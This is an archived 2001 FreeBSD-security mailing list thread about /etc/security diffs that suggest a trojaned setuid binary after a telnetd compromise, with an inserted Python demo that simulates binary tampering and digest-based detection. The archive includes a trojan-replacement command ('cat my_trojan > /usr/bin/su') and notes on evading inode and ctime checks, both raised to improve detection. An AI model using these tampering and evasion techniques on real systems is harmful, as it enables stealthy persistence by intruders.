List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001, Ben Smithurst wrote: > Peter Pentchev wrote: > > ypchfn changed its inode number, and its link count. This means that > > somebody performed an unlink() (delete) on ypchfn, and then created > > a new ypchfn with the same size, timestamp, permissions and stuff, > > but still a new file - and that's where the hardlink count + inum > > tracking of /etc/security kicked in and alerted you. > > hmm, so if an intruder replaced a file without changing its link count, > size, or modification time, I wouldn't be alerted? Perhaps we should > change the security script to print the file's ctime instead of mtime, > since the ctime can't be forged? Or keep md5 signatures around... Jon: Did you patch the telnet hole? alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:23:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 4089437B407 for ; Tue, 24 Jul 2001 11:23:30 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15P6q8-000Gd7-00; Tue, 24 Jul 2001 19:23:28 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f6OINRu78977; Tue, 24 Jul 2001 19:23:27 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Tue, 24 Jul 2001 19:23:27 +0100 From: Ben Smithurst To: alex wetmore Cc: Peter Pentchev , Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724192327.G20105@strontium.shef.vinosystems.com> References: 
<20010724190607.F20105@strontium.shef.vinosystems.com> <20010724110942.L32042-100000@phred.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IrhDeMKUP4DT/M7F" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724110942.L32042-100000@phred.org> X-PGP-Key: http://www.smithurst.org/ben/pgp-key.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --IrhDeMKUP4DT/M7F Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable alex wetmore wrote: >> hmm, so if an intruder replaced a file without changing its link count, >> size, or modification time, I wouldn't be alerted? Perhaps we should >> change the security script to print the file's ctime instead of mtime, >> since the ctime can't be forged? > > Or keep md5 signatures around... well, yes, but that requires more than a single character change to /etc/security. 
:-) -- Ben Smithurst / ben@FreeBSD.org FreeBSD: The Power To Serve http://www.FreeBSD.org/ --IrhDeMKUP4DT/M7F Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xb0ebPzJ+yzvRCwRAjbxAKDKVH09rpYc85kvQtlXdBk0nYTKHwCcCcDA VYQdU61kajpaiZam4CmisL0= =Kzt9 -----END PGP SIGNATURE----- --IrhDeMKUP4DT/M7F-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:25:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 6D36437B405 for ; Tue, 24 Jul 2001 11:25:40 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 19568 invoked by uid 1000); 24 Jul 2001 18:24:44 -0000 Date: Tue, 24 Jul 2001 21:24:44 +0300 From: Peter Pentchev To: Ben Smithurst Cc: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724212444.A19217@ringworld.oblivion.bg> Mail-Followup-To: Ben Smithurst , Jon Loeliger , security@freebsd.org References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> <20010724190607.F20105@strontium.shef.vinosystems.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724190607.F20105@strontium.shef.vinosystems.com>; from ben@FreeBSD.org on Tue, Jul 24, 2001 at 07:06:07PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 24, 2001 at 07:06:07PM +0100, Ben Smithurst wrote: > Peter Pentchev wrote: > > > ypchfn changed its inode number, and its link count. 
This means that > > somebody performed an unlink() (delete) on ypchfn, and then created > > a new ypchfn with the same size, timestamp, permissions and stuff, > > but still a new file - and that's where the hardlink count + inum > > tracking of /etc/security kicked in and alerted you. > > hmm, so if an intruder replaced a file without changing its link count, > size, or modification time, I wouldn't be alerted? Perhaps we should > change the security script to print the file's ctime instead of mtime, > since the ctime can't be forged? 'Replacing' would not be enough - removing the file or moving something over it (the way install(1) does) would change its inode number. It is trivial to replace a file without changing its inode number, but fortunately, almost none of the ready-made toolkits do that, and very few crackers know that they should watch out for this, too. The ctime, too, can be changed, but that would require modifying the inode contents by writing to the raw device. Again, not something most crackers (and any script kiddies) know how to do. G'luck, Peter -- No language can express every thought unambiguously, least of all this one. 
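The two cases argued over in this thread, side by side, as an added example: the unlink-and-recreate that Peter's reading of the setuid diff describes (inode number and link count change, which is what caught the new ypchfn), and the in-place overwrite he says the same fields would miss. This is editor-added Python, not code from the thread or from FreeBSD's /etc/security script; the scratch files, their contents, the 0o4555 mode and the timestamp are constructed here and stand in for the real 32184-byte binaries, and the helper names (`snapshot`, `changed_fields`, `install_forged`, `demo`) are this example's own. It records the ls -l fields the 2001 check effectively compared, adds a SHA-256 digest in the spirit of the mtree digest suggestion made later in the thread, and shows that an in-place overwrite with mode and mtime forged back is invisible to the legacy fields but not to the digest.

```python
import hashlib
import os
import shutil
import stat
import tempfile

# The ls -l fields the 2001 /etc/security setuid check effectively compared.
LEGACY_FIELDS = ("ino", "nlink", "mode", "uid", "gid", "size", "mtime")
# This added checker compares a content digest as well.
ALL_FIELDS = LEGACY_FIELDS + ("sha256",)


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(path):
    """Inode metadata plus a content digest. ctime_ns is recorded because
    utime(2) cannot set it, but the demo does not compare it: the kernel
    stamps it at tick granularity, so a fast baseline/modify can share one."""
    st = os.lstat(path)
    return {
        "ino": st.st_ino, "nlink": st.st_nlink,
        "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size,
        "mtime": int(st.st_mtime), "ctime_ns": st.st_ctime_ns,
        "sha256": sha256_of(path),
    }


def changed_fields(old, new, fields):
    """Names of the fields in `fields` that differ between two snapshots."""
    return [k for k in fields if old[k] != new[k]]


def install_forged(path, data, mode, mtime):
    """Write data at path (in place if it exists) and forge mode and mtime
    back to the baseline, which is what a careful intruder does."""
    exists = os.path.exists(path)
    if exists:
        os.chmod(path, 0o644)  # only needed when not running as root
    with open(path, "r+b" if exists else "wb") as f:
        f.write(data)
    os.chmod(path, mode)
    os.utime(path, (mtime, mtime))


def demo():
    """Replay both tampering patterns from the thread on constructed files
    in a scratch directory (shell one-liners stand in for the real
    32184-byte binary). Returns the changed-field lists for each pattern."""
    d = tempfile.mkdtemp()
    try:
        genuine = b"#!/bin/sh\necho genuine chfn\n"
        trojan = genuine.replace(b"genuine", b"trojan ")  # same length
        old_time = 1000000000  # stands in for the Nov 20 2000 build stamp
        chfn, ypchfn = os.path.join(d, "chfn"), os.path.join(d, "ypchfn")
        install_forged(chfn, genuine, 0o4555, old_time)
        for name in ("chpass", "chsh", "ypchfn"):
            os.link(chfn, os.path.join(d, name))  # one inode, four names
        base_chfn, base_ypchfn = snapshot(chfn), snapshot(ypchfn)

        # Pattern 1 (the posted diff): unlink() ypchfn and drop a same-size
        # replacement in its place. The other three names keep the old inode
        # alive, so the new file gets a different inode number, and every
        # surviving link shows nlink falling from 4 to 3.
        os.unlink(ypchfn)
        install_forged(ypchfn, trojan, 0o4555, old_time)
        p1_ypchfn = changed_fields(base_ypchfn, snapshot(ypchfn), ALL_FIELDS)
        p1_chfn = changed_fields(base_chfn, snapshot(chfn), ALL_FIELDS)

        # Pattern 2 (cat trojan > chfn): overwrite in place. Inode number,
        # link count, mode, size and mtime all survive; only the digest
        # (and the ctime, which utime cannot forge) move.
        base_chfn = snapshot(chfn)
        install_forged(chfn, trojan, 0o4555, old_time)
        p2_legacy = changed_fields(base_chfn, snapshot(chfn), LEGACY_FIELDS)
        p2_digest = changed_fields(base_chfn, snapshot(chfn), ALL_FIELDS)
        return {
            "1a_ypchfn_recreated": p1_ypchfn,
            "1b_chfn_after_sibling_unlink": p1_chfn,
            "2a_overwrite_legacy_fields": p2_legacy,
            "2b_overwrite_with_digest": p2_digest,
        }
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    for label, diff in demo().items():
        print(label, diff or "no change detected")
```

Run it as an ordinary user: pattern 1 reports ino, nlink and sha256 for the recreated ypchfn and nlink alone for its surviving siblings, matching the 6-to-5 drop in the posted diff; pattern 2 reports nothing on the legacy fields and sha256 once the digest is included. For a real baseline the digest has to be stored somewhere the intruder cannot rewrite (read-only media or another host), since a root-level intruder who can replace ypchfn can also edit a local digest file.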
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:33:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id ADAF537B403 for ; Tue, 24 Jul 2001 11:33:41 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15P6zz-000MuP-00; Tue, 24 Jul 2001 19:33:39 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f6OIXdW04179; Tue, 24 Jul 2001 19:33:39 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Tue, 24 Jul 2001 19:33:39 +0100 From: Ben Smithurst To: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724193339.H20105@strontium.shef.vinosystems.com> References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> <20010724190607.F20105@strontium.shef.vinosystems.com> <20010724212444.A19217@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="gr/z0/N6AeWAPJVB" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724212444.A19217@ringworld.oblivion.bg> X-PGP-Key: http://www.smithurst.org/ben/pgp-key.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --gr/z0/N6AeWAPJVB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter Pentchev wrote: > 'Replacing' would not be enough - removing the file or moving something > over it (the way 
install(1) does) would change its inode number. I meant if they did something like cat my_trojan > /usr/bin/su or whatever, which wouldn't change the inode number... But... > The ctime, too, can be changed, ... Never mind then. :-( Maybe /etc/security should be updated to do stuff with mtree's md5/sha1 digest stuff... -- Ben Smithurst / ben@FreeBSD.org FreeBSD: The Power To Serve http://www.FreeBSD.org/ --gr/z0/N6AeWAPJVB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xb+CbPzJ+yzvRCwRArAIAJwIuy80YiSSB96cNnM59MKSDFbIMQCfWbHB N1N++Upsz+rsXHXEXsKReFU= =bIV0 -----END PGP SIGNATURE----- --gr/z0/N6AeWAPJVB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 12:24:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id 2059037B407; Tue, 24 Jul 2001 12:24:30 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.11.3/8.11.3) with ESMTP id f6OJNfs73486; Tue, 24 Jul 2001 15:23:41 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200107231559.f6NFxng17095@earth.backplane.com> References: <200107231012.f6NACgg60192@hak.lan.Awfulhak.org> <200107231559.f6NFxng17095@earth.backplane.com> Date: Tue, 24 Jul 2001 15:23:38 -0400 To: Matt Dillon , Brian Somers From: Garance A Drosihn Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip Cc: "Jeroen Massar" , "'Brian Somers'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: 
bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 8:59 AM -0700 7/23/01, Matt Dillon wrote: >: >: Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only >: put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0). >: >: Any disagreements ? Should this be brought up (explained) on -arch >: now ? > > Make it 56, and you've got to put the whole IP address in the > field, not the short form. Logs are often processed off-host > and the short form wouldn't be useful. And we have to worry > about X at some point. 40 isn't quite big enough. If we are going to go thru the pain of changing it at all, then we should change it to be big enough to be worthwhile. 56 sounds like a good number to me, or perhaps even a little bit larger. Just a LITTLE bit larger though -- the 256 of openbsd sounds like overkill, IMO. I do think it's time to bring this up on -arch. I will do that. -- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 12:24:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id E7B4137B409; Tue, 24 Jul 2001 12:24:31 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.11.3/8.11.3) with ESMTP id f6OJOSs111282; Tue, 24 Jul 2001 15:24:28 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200107231707.f6NH7wU18016@earth.backplane.com> References: <000f01c11315$094851e0$420d640a@HELL> <200107230354.f6N3stj13517@earth.backplane.com> <200107231538.f6NFcZl81468@khavrinen.lcs.mit.edu> 
<200107231557.f6NFvQb17025@earth.backplane.com> <200107231649.f6NGnq982448@khavrinen.lcs.mit.edu> <200107231707.f6NH7wU18016@earth.backplane.com> Date: Tue, 24 Jul 2001 15:24:23 -0400 To: Matt Dillon , arch@FreeBSD.ORG From: Garance A Drosihn Subject: Changes to utmp, wtmp & lastlog entries Cc: Garrett Wollman , brian@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a spin-off of the thread in -security about: bin/22595: telnetd tricked into using arbitrary peer ip I figured we might as well bring it up in -arch at this point. The question is what (if any) changes should we make to the way entries are made to utmp, wtmp, and lastlog. If you look at that PR, there are some security implications wrt how those entries are currently handled, and thus it would be a good idea to do something about them. I'm quoting some of the recent background here, but you'd want to check that PR (and all the followup entries to it) for full details: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=22595 At 10:07 AM -0700 7/23/01, Matt Dillon wrote: >Garrett Wollman wrote: >:<:> Garrett Wollman wrote: >:> : SVR4 has an API. This API is standardized as a part of >:> : the Austin Group process. >: >:> Fine.. then if you want to get all the third party program >:> authors to use a magic API, be my guest. >: >: If they run on Solaris -- which most of them do -- then they already >: do. Nice try, Matt, but far off the mark. >: >:-GAWollman > > Really.. Lets see. wu-ftpd... nope. proftpd... nope. Want me > to continue? Still... If there *is* an API which would be common to both Solaris and FreeBSD, then it should be much easier to get third-party program authors to accept changes to use that API. 
As for the best change to make, let me suggest that we basically follow both Matt's and Garrett's recommendations (which were made in other messages in the thread). Let's increase the size of UT_HOSTSIZE to at least 56, so the field can always hold the complete IP address (even for IPv6) in the field, but let's encourage programs to use whatever the standardized API is to make these entries. There will be a bit of a transition-hit when the size of the field is changed, where anything that uses or sets these records will need to be recompiled. Maybe we should do this change as part of 5.0, and not MFC it. If you read all the entries in the PR, Brian noted that OpenBSD has already changed UT_HOSTSIZE to be 256. I might go for something larger than 56 (such as 64, just to be a computer geek who always picks powers of 2...), but I don't think freebsd needs to go all the way to 256. I don't feel too strongly about the actual solution decided upon, but I did think it was about time to have this topic explicitly mentioned in freebsd-arch, so we can figure out what is best to do and then do whatever that is. 
-- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 15:42:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 6647337B401 for ; Tue, 24 Jul 2001 15:42:31 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9464866E04; Tue, 24 Jul 2001 15:42:29 -0700 (PDT) Date: Tue, 24 Jul 2001 15:42:29 -0700 From: Kris Kennaway To: Wade Majors Cc: security@freebsd.org Subject: Re: telnetd remote root exploit released Message-ID: <20010724154228.A36368@xor.obsecurity.org> References: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="n8g4imXOkfNTN/H1" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from wade@ezri.org on Tue, Jul 24, 2001 at 12:54:26PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --n8g4imXOkfNTN/H1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jul 24, 2001 at 12:54:26PM -0400, Wade Majors wrote: > This is the same one we are all patched against now, right? If you applied the patch from the advisory, not the one floating around on this list last week, yes. 
Kris --n8g4imXOkfNTN/H1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XfnUWry0BWjoQKURAloTAJ93lJxr9dspo0M+mLXpGWw0+vvFTwCdGaSN k0a6xhxfjXRrRiKgZ19QaEM= =AEG5 -----END PGP SIGNATURE----- --n8g4imXOkfNTN/H1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 15:47:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id CE90137B408 for ; Tue, 24 Jul 2001 15:47:12 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EF91A66E04; Tue, 24 Jul 2001 15:47:11 -0700 (PDT) Date: Tue, 24 Jul 2001 15:47:11 -0700 From: Kris Kennaway To: Peter Pentchev Cc: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724154711.B36368@xor.obsecurity.org> References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dc+cDN39EJAMEtIO" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724205228.A16243@ringworld.oblivion.bg>; from roam@orbitel.bg on Tue, Jul 24, 2001 at 08:52:28PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --dc+cDN39EJAMEtIO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 08:52:28PM +0300, Peter Pentchev wrote: > On Tue, Jul 24, 2001 at 11:32:23AM -0500, Jon Loeliger wrote: > > Hi Folks, > > > > This
morning, on a machine that's been up for 33 days,
> > I suddenly saw these /etc/security diffs:
> >
> > setuid diffs:
> > 20,22c20,22
> > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
> > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
> > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
> > ---
> > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
> > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
> > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
>
> This means that there were 6 files hardlinked to inode 8047, now there are
> only five. One of the links was removed and probably replaced with something
> else, which cannot point to the same inode.
>
> > 53,55c53,55
> > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
> > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
> > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
> > ---
> > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
> > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
> > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
>
> ypchfn changed its inode number, and its link count. This means that
> somebody performed an unlink() (delete) on ypchfn, and then created
> a new ypchfn with the same size, timestamp, permissions and stuff,
> but still a new file - and that's where the hardlink count + inum
> tracking of /etc/security kicked in and alerted you.
This is a signature I've seen before; chances are someone has gained root on your machine (probably through telnetd) Kris --dc+cDN39EJAMEtIO Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XfrvWry0BWjoQKURAvJeAKDsCZkpIj6+SPgDlJKLcZcHHXsGQQCfc7uh mPBrUpzcRNEQq2OkAA9sHhg= =jAzX -----END PGP SIGNATURE----- --dc+cDN39EJAMEtIO-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:19:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from oksala.org (modemcable048.156-201-24.mtl.mc.videotron.ca [24.201.156.48]) by hub.freebsd.org (Postfix) with ESMTP id D63F137B407 for ; Tue, 24 Jul 2001 16:19:48 -0700 (PDT) (envelope-from silence@oksala.org) Received: from oksala.org (silence@silence [24.201.156.48]) by oksala.org (8.11.4/8.11.1) with ESMTP id f6ONGH377325 for ; Tue, 24 Jul 2001 19:16:18 -0400 (EDT) (envelope-from silence@oksala.org) Message-ID: <3B5E01C0.4234B000@oksala.org> Date: Tue, 24 Jul 2001 19:16:16 -0400 From: Pierre-Luc Lespérance X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: Security Check Diffs Question References: <200107241632.LAA05639@chrome.jdl.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jon Loeliger wrote:
>
> Hi Folks,
>
> This morning, on a machine that's been up for 33 days,
> I suddenly saw these /etc/security diffs:
>
> setuid diffs:
> 20,22c20,22
> < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
> < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
> < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
> ---
> > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
> > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
> > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
> 53,55c53,55
> < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
> < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
> < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
> ---
> > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
> > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
> > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh

If your box is not really* important, you should leave it like that and wait for the return of the Evil telnetd cracker (if any) and mail a little paper to his ISP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:41:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from cdrrdslgw2poolA156.cdrr.uswest.net (cdrrdslgw2poole180.cdrr.uswest.net [63.228.165.180]) by hub.freebsd.org (Postfix) with ESMTP id 9B1A437B406; Tue, 24 Jul 2001 16:41:54 -0700 (PDT) (envelope-from dean@cdrrdslgw2poolA156.cdrr.uswest.net) Received: (from dean@localhost) by cdrrdslgw2poolA156.cdrr.uswest.net (8.11.4/8.11.2) id f6ONfpi99078; Tue, 24 Jul 2001 18:41:52 -0500 (CDT) (envelope-from dean) Date: Tue, 24 Jul 2001 18:41:52 -0500 (CDT) From: "Dean M. 
Phillips" Message-Id: <200107242341.f6ONfpi99078@cdrrdslgw2poolA156.cdrr.uswest.net> To: ben@FreeBSD.org Cc: jdl@jdl.com, security@FreeBSD.org In-reply-to: <20010724193339.H20105@strontium.shef.vinosystems.com> (ben@FreeBSD.org) Subject: Re: Security Check Diffs Question Reply-To: deanmphillips@uswest.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For mission-critical servers, I prefer to use tripwire. Burn the binary and the database onto a CDROM and it will be nearly tamper-proof. Oh yes, the default config file needs to be updated, but you really ought to customize it anyway. -- Dean M. Phillips deanmphillips@uswest.net Office: 319-295-0407 Home: 319-373-9825 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:47:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 091F937B401 for ; Tue, 24 Jul 2001 16:47:45 -0700 (PDT) (envelope-from kzaraska@student.uci.agh.edu.pl) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id 3A3391C67; Wed, 25 Jul 2001 01:47:26 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id E74835475; Wed, 25 Jul 2001 01:47:25 +0200 (CEST) Date: Wed, 25 Jul 2001 01:47:25 +0200 (CEST) From: Krzysztof Zaraska X-Sender: 